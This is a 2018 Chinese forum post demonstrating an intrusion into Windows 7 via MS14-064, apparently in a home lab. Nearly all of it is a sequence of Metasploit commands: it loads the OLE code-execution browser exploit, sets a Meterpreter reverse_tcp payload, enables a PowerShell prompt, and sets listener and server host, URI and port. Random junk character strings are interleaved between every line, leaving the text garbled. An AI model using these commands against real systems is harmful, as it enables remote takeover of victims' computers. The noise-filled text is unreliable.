找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1583|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 a4 s4 }2 j( |: ] 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 # j8 V, e$ j, U

$ B; g3 v9 G4 i9 p g1 M

3 W: G) w" Z2 c# }6 q; I- M9 @ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , x4 @$ ^2 @ r" R: \" k: C

! `7 G) o9 t/ Z% l- P# P" i

0 p) b. t! i' r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ P; p( x5 h* i: A+ k

) \: d0 }" ?" ^" r/ L

v. s2 r6 w( a w& U$ {1 h             set AllowPowershellPrompt true 0 e, r1 A v7 K

0 W4 z! T5 l- I/ Z$ W; h

- u, Y' e% k/ f* a" h) J             Set LHOST 192.168.0.109) D+ }- P* h0 E( J0 R

9 \' Q. v: k- e" v

9 u `! e7 ~% O( t$ d" F             set SRVHOST 192.168.0.109: {1 j% J, B1 m" k/ _2 R8 ~

- n# z" b: o# j: C: n! i1 v2 p

) V6 G1 m1 z1 T* \             Set uripath share : C- L% f) M y, ~/ X! P

' H9 `/ Q6 |* Y' w1 z

/ e2 h2 N8 q! C. e9 u             Set srvport 80 5 j4 H$ b+ x9 r* D% Q' s

! ?/ T4 o+ w; u3 j

+ j' j9 ^" f0 t# Z   % s* l. ^$ v- h9 B9 m1 O

8 R3 V0 t# [3 R( j$ V

$ G( z+ B: [8 D3 c* ~7 l T: j, N   C: {9 K* g9 ~% g# @7 a

; l6 K* a; i" t' F' N; c* b

& N1 d4 I1 B- }! q& W( ?* V. g# d   + L+ H. B& o o

* F# e' M) m6 E0 A6 F' W; A

/ Z( f* ` w. z0 }4 b   3 C; z' F0 p; g% r* b

) j/ w) K! ~, h. E2 ]4 N+ m

8 b, ~2 x6 \' F. H! v   2 u) s9 J3 Y% z6 d4 F

$ u7 a1 |" F- W7 n2 k6 L

& t+ j* w( o) L2 ?$ o, z1 u* z; W 下面我们来访问本地地址如图:. V6 S1 l$ X8 k7 u* N" u4 Q" ?6 E

3 M0 @) L t, J/ `" Z% ^

4 ~ B& r% j+ ^! y: P   9 e* n" j4 X# o& k" m

/ Q- C e- J0 P3 V

) j9 L+ `) R+ u: G. n0 q; N6 }: q  7 T. u% ?' ?* Q. o$ k5 p3 M2 m

0 A V5 @+ ?. |

) L; s8 A' _: ?) |- g 7 Q! q5 ~1 s* Y% g

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表